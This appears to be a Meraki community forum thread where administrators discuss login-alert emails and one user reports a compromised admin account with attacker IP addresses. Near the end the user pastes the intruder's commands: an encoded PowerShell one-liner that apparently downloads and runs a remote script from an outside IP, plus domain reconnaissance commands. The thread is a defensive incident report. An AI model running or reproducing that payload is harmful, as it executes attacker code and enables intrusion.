Unauthorised EMail from Meraki - subject Unauthorized Login to Your Meraki Dashboard

AxL1971
Building a reputation

Unauthorised EMail from Meraki - subject Unauthorized Login to Your Meraki Dashboard

We got an email about unauthorised login and looking on the dashboard for all logins,
 
Subject of email 
 
[Important Notice] Action Required: Unauthorized Login to Your Meraki Dashboard
 
Did anyone else get this email over night
 
Looking on the dashboard no suspcious logins or other changes done
19 REPLIES 19
Brash
Kind of a big deal
Kind of a big deal

Have never received an email like that.

What address is the email from? What is the suggested "Action Required"?

GreenMan
Meraki Employee
Meraki Employee

I recommend talking to meraki Support - they should be able to confirm if this is from Meraki.

alemabrahao
Kind of a big deal
Kind of a big deal

It's real, I also received it, I checked my login attempts and something was strange, so I removed the user who was accessing and generating the alerts.

 

I suggest you enable Multi-Factor Authentication.

 

 

I am not a Cisco Meraki employee. My suggestions are based on documentation of Meraki best practices and day-to-day experience.

Please, if this post was useful, leave your kudos and mark it as solved.
AxL1971
Building a reputation

we already use MFA

AxL1971
Building a reputation

on the dashboard, under login attempts I cant see any unauthorised logins and all successfull logins are from legitimate users. No suspicious IP addresses.

 

So not entirely sure which account was compromised.

Franck
Just browsing

Same for us,

the subject is "[Important Notice] Action Required: Unauthorized Login to Your Meraki Dashboard"

from <hello@mail.meraki.com>

by lemur.mktdns.com [199.15.215.228].

This is a fake.
alemabrahao
Kind of a big deal
Kind of a big deal

It actually looks like a fake email, I completely agree, but I noticed a strange login on my dashboard about another user, so I decided to remove that user just to be sure. I didn't click on any links because I didn't trust that email either.

I am not a Cisco Meraki employee. My suggestions are based on documentation of Meraki best practices and day-to-day experience.

Please, if this post was useful, leave your kudos and mark it as solved.

I think it's sent from a marketing/mass-mail company Meraki uses. I checked other previous legit emails I've received from Meraki in the past and they also came from mktdns.com 

I have checked It too:

 

alemabrahao_0-1670260845478.png

 

I am not a Cisco Meraki employee. My suggestions are based on documentation of Meraki best practices and day-to-day experience.

Please, if this post was useful, leave your kudos and mark it as solved.
CharlieBailey
Here to help

I also received this but it seems like none of my coworkers did. I haven’t been able to check headers of the email or dashboard activity yet as I’ve been on mobile since I got the email. I was going to reach out to Meraki support to see if it’s legit or get more info, I have access to 100 different Meraki orgs so I’m not sure if it’s saying my own account was suspicious or a user on any org I have access to was suspicious 

 

EDIT: After going through every organization I have access to, I did find one with dozens of login attempts on a certain account from many different IPs. The account does show having MFA enabled but many of the logins were successful

AxL1971
Building a reputation

looking at the SMTP headers email orginated from Meraki

Franck
Just browsing

If this mail is legit, then DKIM might be corrected...

alemabrahao
Kind of a big deal
Kind of a big deal

It was confirmed by support:

 

 

alemabrahao_0-1670277950764.png

 

I am not a Cisco Meraki employee. My suggestions are based on documentation of Meraki best practices and day-to-day experience.

Please, if this post was useful, leave your kudos and mark it as solved.
AxL1971
Building a reputation

I got another email one last night, and looking at the login attempts on dashboard no failed logins or anything suspicious.

alemabrahao
Kind of a big deal
Kind of a big deal

I suggest you open a case like me.

I am not a Cisco Meraki employee. My suggestions are based on documentation of Meraki best practices and day-to-day experience.

Please, if this post was useful, leave your kudos and mark it as solved.
AxL1971
Building a reputation

case opened and spoke to Meraki looks to be a legitimate notification

 

Very odd never had this alert before but started now. I assume some changes done on the portal side for these alerts to come thru.

CharlieBailey
Here to help

This alert is becoming more annoying than anything. A coworker of mine received it two days after I did, but without any additional info it'll be impossible to act on. We have close to 100 networks we manage, it's not sustainable to look through the login attempt section of 100 organizations. I don't see this info accessible via the API either

Bargi
Comes here often

I got one of these a 2 weeks ago (which I missed as I was on holiday) and then this morning.

Checked and there's been multiple failed aand sucesfull logins to a second admin account from all over the world.

admin2 is the compromised account. admin1 is mine.

 

admin2@local.com193.56.73.134, TurkeyLoginFailureSat, 03 Dec 2022 16:32:22 GMT
admin2@local.com89.187.185.171Los Angeles, CALoginFailureSat, 03 Dec 2022 14:25:11 GMT
admin2@local.com193.202.9.119Clinton, MDLoginSuccessSat, 19 Nov 2022 23:20:38 GMT
admin1@local.com212.60.21.161Barnsbury, United KingdomLoginFailureFri, 18 Nov 2022 05:41:00 GMT
admin1@local.com85.239.35.184, Russian FederationLoginFailureWed, 16 Nov 2022 17:19:25 GMT
admin1@local.com185.68.154.40,LoginFailureFri, 11 Nov 2022 01:07:37 GMT
admin2@local.com185.61.217.156Chisinau, MoldovaLoginFailureWed, 09 Nov 2022 17:01:43 GMT
admin1@local.com45.132.186.237, AustraliaLoginFailureWed, 09 Nov 2022 16:54:31 GMT
admin2@local.com45.10.164.207, CanadaLoginFailureWed, 09 Nov 2022 14:41:08 GMT
admin2@local.com171.22.30.220Amsterdam, NetherlandsLoginSuccessFri, 28 Oct 2022 22:15:33 GMT
admin1@local.com194.156.124.37London, United KingdomLoginFailureSun, 23 Oct 2022 22:24:20 GMT
admin2@local.com193.233.251.191Sheridan, WYLoginFailureSun, 23 Oct 2022 15:38:49 GMT
admin1@local.com185.94.34.99,LoginFailureWed, 12 Oct 2022 12:18:20 GMT
admin1@local.com88.218.45.62Amsterdam, NetherlandsLoginFailureTue, 11 Oct 2022 20:50:44 GMT
admin2@local.com45.140.204.187, ChinaLoginSuccessSat, 08 Oct 2022 19:08:14 GMT
admin2@local.com45.138.100.147Frankfurt Am Main, GermanyLoginSuccessSat, 08 Oct 2022 09:23:25 GMT
admin2@local.com95.216.4.218Tuusula, FinlandLoginSuccessMon, 03 Oct 2022 20:23:18 GMT
admin2@local.com89.22.239.167Moskva, Russian FederationLoginSuccessMon, 03 Oct 2022 06:21:11 GMT
admin2@local.com193.56.65.139, TurkeyLoginSuccessSun, 02 Oct 2022 20:19:32 GMT
admin1@local.com193.203.9.179, United KingdomLoginFailureFri, 30 Sep 2022 04:27:16 GMT
admin2@local.com185.61.218.92Montauban, FranceLoginFailureFri, 30 Sep 2022 03:50:17 GMT
admin2@local.com45.80.105.83, United KingdomLoginFailureWed, 28 Sep 2022 14:11:59 GMT
admin1@local.com91.243.190.219, ChinaLoginFailureTue, 27 Sep 2022 17:44:48 GMT
admin1@local.com85.239.36.154, GermanyLoginFailureTue, 27 Sep 2022 06:51:20 GMT
admin1@local.com83.142.55.240, United KingdomLoginFailureTue, 27 Sep 2022 00:52:51 GMT
admin1@local.com37.44.197.32, PolandLoginFailureMon, 26 Sep 2022 10:47:34 GMT
admin1@local.com194.104.8.233, CanadaLoginFailureMon, 19 Sep 2022 22:51:48 GMT
admin1@local.com45.148.234.11, United KingdomLoginFailure

Thu, 15 Sep 2022 02:22:15 GMT

 

What's strange is this admin2 account was created about 6 years ago and never used.

What's more confusing is that the persons email account never got any of the emails with a confirmation code to login with. (perhpas something with it being so old it doesn't get it?)

 

What's not confusing is what they were up to...

 

Command Line requestcommand: powershell -e DQAKAFAAbwB3AGUAcgBTAGgAZQBsAGwALgBlAHgAZQAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAAaABpAGQAZABlAG4AIAB7AA0ACgAkAGEAPQAiADUANAA5ADIAOAA2ADgANwA3ADIAOAAwADEANwA0ADgANgA4ADgAMQA2ADgANwA0ADcAMgA4ADAANwAyADgAMQA4ADcAMQA3ADMANgA4ADgAOAA3ADgAMgA4ADAANgA4ADgANwA3ADYAOAAyADgAIgANAAoAJABiAD0AIgAxADEANwAzADYAOAAwADgANgA3ADYANQA2ADgANwA3ADYANwA5ADgANgA2ADgAOAAwADgANgA3ADYANAA0ADgAMQA3ADYAOAA3ADQAMQA2ADgANwA2ADcAOQA3ADIANwAxACIADQAKACQAYwA9AFsAcwB0AHIAaQBuAGcAXQAoADAALgAuADMANwB8ACUAewBbAGMAaABhAHIAXQBbAGkAbgB0AF0AKAAyADkAKwAoACQAYQArACQAYgApAC4AcwB1AGIAcwB0AHIAaQBuAGcAKAAoACQAXwAqADIAKQAsADIAKQApAH0AKQAtAHIAZQBwAGwAYQBjAGUAIAAiACAAIgANAAoAJABkAD0AWwBSAGUAZgBdAC4AQQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQAVAB5AHAAZQAoACQAYwApAA0ACgAkAGUAPQBbAHMAdAByAGkAbgBnAF0AKAAzADgALgAuADUAMQB8ACUAewBbAGMAaABhAHIAXQBbAGkAbgB0AF0AKAAyADkAKwAoACQAYQArACQAYgApAC4AcwB1AGIAcwB0AHIAaQBuAGcAKAAoACQAXwAqADIAKQAsADIAKQApAH0AKQAtAHIAZQBwAGwAYQBjAGUAIAAiACAAIgANAAoAJABmAD0AJABkAC4ARwBlAHQARgBpAGUAbABkACgAJABlACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQANAAoAJABmAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAJAB0AHIAdQBlACkADQAKAEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADQALgAxADgAMAAuADQAOAAuADEAMQA2ADoANAA3ADQANAAzAC8AcwB2AGMAaABvAHMAdAAuAHAAcwAxACcAKQApAA0ACgB9AA0ACgA=
Command Line requestcommand: powershell (Get-ADComputer -Filter *).Count
Command Line requestcommand: net users /domain

 

PC it was run on seems fine, run 3 different AV/Anti malware and Autoruns.(open to anything else worth running on it)

other 5 PCs on the network we've run the above and seem fine.

Unfortuantly all the event logs have rolled over from the date it occured 😞

 

I won't lie, admin2 probably had a crappy password  but not sure how they got around the email alerts.(will be looking at uses laptop soon)

 

Awaiting a call from Meraki now to speak to them about it... will update if anything interesting... Merry Christmas!

Bargi
Comes here often

Meraki support person called and proceeded to read from a corporate comms stating how they've seen this activity accross multiple clients and should change passwords blah, blah, blah

 

Offered to have their security team reach out, which I said yes and if they can answer why the 2fa email didn't come through.

 

Checked the users laptop and it's fine and O365 logs show no emails from Meraki to them...

Get notified when there are additional replies to this discussion.